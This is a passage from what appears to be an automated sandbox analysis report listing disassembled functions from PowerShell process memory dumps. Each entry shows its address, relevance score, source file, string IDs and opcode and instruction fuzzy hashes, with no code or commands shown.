                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-2312759404
                                                                                                                                                                                                          • Opcode ID: ff0ba42482028c54c5c324e3bd5f8888e345c940c04b411266a8bdddb00cbfa1
                                                                                                                                                                                                          • Instruction ID: ddc522af6ac3a85bcb7f31b5e645e226f1e8c96a84d95adb38723072d57e0788
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff0ba42482028c54c5c324e3bd5f8888e345c940c04b411266a8bdddb00cbfa1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF0322B4A00219DFDB24DB64C850BE9BBB2FF85344F1188A9D8596B781CB71ED81CF61
                                                                                                                                                                                                          Function 03269848 Relevance: .7, Instructions: 715COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5236bb3b05458c66f1bd9b2b35d47315f30ca2e61d551d89a22a4e2512ed22f9
                                                                                                                                                                                                          • Instruction ID: 79c0db8d0ca0a33378d41da55cce2e572a79f37c5bdca70e90a68d40e6890000
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5236bb3b05458c66f1bd9b2b35d47315f30ca2e61d551d89a22a4e2512ed22f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F752AF74A2021ACFCB24DF65C944BADBBB6BF89204F1440A9E40AEB355DB709DC5CF91
                                                                                                                                                                                                          Function 0326EAB0 Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e8bebc2b8e9a3aa5c3c9b5a8242bc988fef9cc6f3abd6f087fb79875e9a8688f
                                                                                                                                                                                                          • Instruction ID: 4a942531f8516e420b919be0beb4bc51ea2e39f33513be06e614db1a119bb0f3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8bebc2b8e9a3aa5c3c9b5a8242bc988fef9cc6f3abd6f087fb79875e9a8688f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B91D575B017589BDB2ADFB48A005AE77F2EFC4600B008D2ED052AB394DF38AD058BD5
                                                                                                                                                                                                          Function 0326EAC0 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 51aa0db47bbf8ff94d0b8023969cf435a7903e89eb82e19ebf4ba34426826000
                                                                                                                                                                                                          • Instruction ID: dda86c000517769cd31ef9f2f10e31c1c9fef6557880a0e90453a8647dbe7cc2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51aa0db47bbf8ff94d0b8023969cf435a7903e89eb82e19ebf4ba34426826000
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD91B375B017589BDB29DFB48A415AFB7F2EFC4600B00892DD056AB358DF38AD058BC5
                                                                                                                                                                                                          Function 0310F288 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018016839.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_310d000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ff3df42cc3bf3b1e76ded1260b8d565eaf72a657a4d4d3ad96bbc357a4538a6b
                                                                                                                                                                                                          • Instruction ID: 393daa09977b8655649165f3f367dece4b265643d7ccc1fbb8714014139f15fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff3df42cc3bf3b1e76ded1260b8d565eaf72a657a4d4d3ad96bbc357a4538a6b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321DE76504200EFCB25DF64D9C1B26BBA5FB8C324F28C5A9E8090E286C776D857CB61
                                                                                                                                                                                                          Function 07735030 Relevance: 26.0, Strings: 20, Instructions: 1040COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-306633379
                                                                                                                                                                                                          • Opcode ID: 815e6dd919e4fc3aaa20030d07ff58690c20028f93c1326673258c0a70255e40
                                                                                                                                                                                                          • Instruction ID: 73370abac0eedcb94b0b2f11c1270751b7c4c7c838da0fbdbf0f9f758c4d8ac5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 815e6dd919e4fc3aaa20030d07ff58690c20028f93c1326673258c0a70255e40
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB928EB0A01314DFDB14CBA8C454BA9BBF2BB85345F258869D9056F396CB75EC82CF60
                                                                                                                                                                                                          Function 093D16C8 Relevance: 19.4, Strings: 15, Instructions: 677COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1734347949
                                                                                                                                                                                                          • Opcode ID: 5abd9ebef893b6abd214c36843a970e900059ed5b12cdd11c007f8f66e444056
                                                                                                                                                                                                          • Instruction ID: 4f54bc83b71cbe2ac38bfedff0852d9897c70e04432a2fea2cc71786a764c794
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5abd9ebef893b6abd214c36843a970e900059ed5b12cdd11c007f8f66e444056
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0532E636B06204DFDB28CFA8D4606AABBE6BF85350F148469E8059B755CB35DC81CFA1
                                                                                                                                                                                                          Function 0773500E Relevance: 13.3, Strings: 10, Instructions: 844COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-1714417271
                                                                                                                                                                                                          • Opcode ID: 367cad941b91ba3b17fed4efe0d7c7675c69f3f78cca3aa471b8f55452e32777
                                                                                                                                                                                                          • Instruction ID: 167a668fd4267692e51b5f320b4aaf47ecace82ebfc3fea0c9a9ed4ef5a4bc3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367cad941b91ba3b17fed4efe0d7c7675c69f3f78cca3aa471b8f55452e32777
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 797280B4A01314DFDB14CBA8C444BA9BBB2FB85345F258869D9056F356CB76EC82CF60
                                                                                                                                                                                                          Function 093D3CEE Relevance: 13.0, Strings: 9, Instructions: 1786COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$tPkq$tPkq$tPkq$tPkq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-184681135
                                                                                                                                                                                                          • Opcode ID: 02ccef3e8c22041c3fa9f086bfe1bf68afc9e313aadf0b99c5cacdd1870022f9
                                                                                                                                                                                                          • Instruction ID: 21d624e24b067e13aca69e0c5d9b20e5012f3e7d70714834f3596469db23950a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ccef3e8c22041c3fa9f086bfe1bf68afc9e313aadf0b99c5cacdd1870022f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7821A36702204DFCB24DF6CE4646AABBA2FF85350F248469E9459B2E1DB35DC41CFA1
                                                                                                                                                                                                          Function 07733678 Relevance: 8.4, Strings: 6, Instructions: 904COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-909339818
                                                                                                                                                                                                          • Opcode ID: 161de068e51ce185b71b70f338c42037dbbaa66e6177123cf2af097425f87a76
                                                                                                                                                                                                          • Instruction ID: cdf079384f5c6cfae4497c36e62e908d5f42bc6a10bba7afc91c72005f17c76c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 161de068e51ce185b71b70f338c42037dbbaa66e6177123cf2af097425f87a76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD8280B4E00255DFD724DF58C850BAAB7B2BF85304F10C9A9D85A6B745CB71AC81CFA1
                                                                                                                                                                                                          Function 07731148 Relevance: 8.1, Strings: 6, Instructions: 594COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq$4'kq$tPkq$tPkq
                                                                                                                                                                                                          • API String ID: 0-2225000908
                                                                                                                                                                                                          • Opcode ID: fbc9b97269111bd5e147651b17e118200741d2ed7906e698275c93a7c1a46a2e
                                                                                                                                                                                                          • Instruction ID: b536ef99e955de5f5be1897dc0d9450e18f91396067b60387afb73f0db1d42ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbc9b97269111bd5e147651b17e118200741d2ed7906e698275c93a7c1a46a2e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A327DB0B00209DFD714CB98C450BAABBE2EF85354F55C869E905AB396CB72DC41CBA1
                                                                                                                                                                                                          Function 07730840 Relevance: 6.5, Strings: 5, Instructions: 231COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                                                                                                          • API String ID: 0-1023320533
                                                                                                                                                                                                          • Opcode ID: 640d36887c319a570fa7d0321edb496ddc1c73f6b6031749e8b032eb57a732ef
                                                                                                                                                                                                          • Instruction ID: 57a8ea1908a01fc9059d02698263087588aede09f491c8413c76be0e75d4cc38
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640d36887c319a570fa7d0321edb496ddc1c73f6b6031749e8b032eb57a732ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C271F5B5B00216CFCB24DB7DD4102ABBBA6EF85390F24847AC859DB682DB35D941C7E1
                                                                                                                                                                                                          Function 0773D716 Relevance: 5.0, Strings: 3, Instructions: 1234COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-2478202913
                                                                                                                                                                                                          • Opcode ID: 000a7d120f999753e9d27898a3165d417e1bde22ab797e027395df3324a4177e
                                                                                                                                                                                                          • Instruction ID: ed0ef39a8aa5babdc00d7c7a9d262cb5db6645606d01a9d19bcca63f65d322d3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 000a7d120f999753e9d27898a3165d417e1bde22ab797e027395df3324a4177e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFC233B4A012189FD724DB64C850BEABBF2FF85304F1088A9D8596B781CB71ED81CF61
                                                                                                                                                                                                          Function 07735DB6 Relevance: 3.0, Strings: 2, Instructions: 493COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-4171853269
                                                                                                                                                                                                          • Opcode ID: 8943d5d3d9c426a036b4b3fa5a2c37c6b11f8e11650e521ae16104a2aff755f7
                                                                                                                                                                                                          • Instruction ID: 419f257be1245bb6ff9b6c37f867212eaba716295be711dc070799a20a3e9142
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8943d5d3d9c426a036b4b3fa5a2c37c6b11f8e11650e521ae16104a2aff755f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7226CB4A00305DFDB14CBA8C484BA9BBB2BB85345F25C469D919AF356CB75EC81CB60
                                                                                                                                                                                                          Function 0773126C Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq$4'kq
                                                                                                                                                                                                          • API String ID: 0-4171853269
                                                                                                                                                                                                          • Opcode ID: c72d036b3c4366124f96ab3fa23019f3894eb580829cfdb022359f2f4645e0f7
                                                                                                                                                                                                          • Instruction ID: 0cc427d1224b007d733197c8a4a4e2f81aaea0d7b31ade786e25a36bd98d4e32
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c72d036b3c4366124f96ab3fa23019f3894eb580829cfdb022359f2f4645e0f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 110269B4A01208DFEB14CB58C440BAABBF2FF85354F55C869E805AB366C772EC41CB61
                                                                                                                                                                                                          Function 07730B48 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: tPkq$tPkq
                                                                                                                                                                                                          • API String ID: 0-1241829555
                                                                                                                                                                                                          • Opcode ID: d6dae9ee48e325b3c5c76b83803edba9ed9d016aeda76022a616ba8fc10ffa49
                                                                                                                                                                                                          • Instruction ID: f865f3cb86d76f64295f583eaa7ac887943e0e5a15e7a0660b64192d04cd7eee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6dae9ee48e325b3c5c76b83803edba9ed9d016aeda76022a616ba8fc10ffa49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F35147B2704355CFDB219B6D8811BABBBA3AF82351F24C47BD549CB293CA75C841C7A1
                                                                                                                                                                                                          Function 0773449A Relevance: 2.1, Strings: 1, Instructions: 888COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 6817115c37d01d1c550d8fc2be3463ba1821413e0ba11e120ad92c6d7f6e4e38
                                                                                                                                                                                                          • Instruction ID: a9892276cc51891b4ca5738a2e4643d41f9b86bdeae49dfe61422f4707eea428
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6817115c37d01d1c550d8fc2be3463ba1821413e0ba11e120ad92c6d7f6e4e38
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F88270B4A00255DFD724DF58C850BAAB7B2BF85304F10CDA9D85AAB745CB31AD81CFA1
                                                                                                                                                                                                          Function 0773365A Relevance: 2.1, Strings: 1, Instructions: 834COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 2a7934bd2ca8c4e38f2ea4821e650ee2d1683b34ad8068c136773cec5d34242a
                                                                                                                                                                                                          • Instruction ID: 2faf084379674bebda411b97912f56fff01393f6eeda9fdac182fc897c0465b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a7934bd2ca8c4e38f2ea4821e650ee2d1683b34ad8068c136773cec5d34242a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A727FB4A00255DFD724DF58C850BAABBB2FF85344F10C9A9D85A6B745CB31AC81CFA1
                                                                                                                                                                                                          Function 07734667 Relevance: 1.9, Strings: 1, Instructions: 646COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 55f46c356c5b00efd96897c95488ec46098f986c453862ceba384817315f1c1e
                                                                                                                                                                                                          • Instruction ID: bbb1a6f8e27996890d5e8f6885f04867a1da1e1a2e09501d8a9ed58010a97e88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55f46c356c5b00efd96897c95488ec46098f986c453862ceba384817315f1c1e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B525DB4A00254DFD724DF54C850BAABBB2BF85304F20CDA9D85A6B745CB71AD81CFA1
                                                                                                                                                                                                          Function 0773D8DA Relevance: 1.9, Strings: 1, Instructions: 624COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 45454b718d9af75146b97ae132847c5cede5d36905e0c38a0cb18a8a78dcbbe7
                                                                                                                                                                                                          • Instruction ID: 2d7a09c4c91c1b5e9d77d25a842ead2ae150235205f8bb2fae2f1384eb2be1d7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45454b718d9af75146b97ae132847c5cede5d36905e0c38a0cb18a8a78dcbbe7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 944242B4A012189FD724DB54D950BEABBF2FF85304F1088A9D8596B781CB71ED81CF61
                                                                                                                                                                                                          Function 0773DB6C Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: d85fcad241e7c02a34ac6b728367ac92ae50a518d655ce6e06f8454f4915d324
                                                                                                                                                                                                          • Instruction ID: 79dc7367ff500e865059d5eb4c315f888479644da1e417530f7265570655e73a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d85fcad241e7c02a34ac6b728367ac92ae50a518d655ce6e06f8454f4915d324
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2121CB4A00219DFEB34CB64C850BE9B7B2FB45344F1188A9D859AB781DB71ED81CF61
                                                                                                                                                                                                          Function 0773D961 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144027903182.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7730000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 0f100e80176935981fa1d351dfc029dd40f124a33b5f011e758145856a7931d9
                                                                                                                                                                                                          • Instruction ID: 94459f1390c6ddd43130360d74851e00d589dbad54a92fd07c9e54bbca718ab1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f100e80176935981fa1d351dfc029dd40f124a33b5f011e758145856a7931d9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90122CB4A00219DFEB34CB64C850BE9B7B2FB45344F1188A9D859AB781DB71ED81CF61
                                                                                                                                                                                                          Function 093D18D8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144033826196.00000000093D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093D0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_93d0000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'kq
                                                                                                                                                                                                          • API String ID: 0-3255046985
                                                                                                                                                                                                          • Opcode ID: 32df5be7579d07325674fe682ea6e441782c32d6ec981906182d8fad46253dd3
                                                                                                                                                                                                          • Instruction ID: 7eefcbcfe29250add04cd50234fdd61ef41f74ebe42f295b93b4a10658aa1a87
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32df5be7579d07325674fe682ea6e441782c32d6ec981906182d8fad46253dd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8521E773B0A2049BEB685AE554217BA7ADA6F81380F154029E8459B681EB35C981CFF2
                                                                                                                                                                                                          Function 0326E5C8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000002.00000002.144018487368.0000000003260000.00000040.00000800.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_3260000_powershell.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (&kq
                                                                                                                                                                                                          • API String ID: 0-3641282905
                                                                                                                                                                                                          • Opcode ID: 939684e5acc306e72aed9c0a9f4a6b7596187cba5c50385ff8047ddf5a5de6e8
                                                                                                                                                                                                          • Instruction ID: 60e9f5610022f6f49e22a141ce748405b9763e91d5c960de3a619d70f7b25732
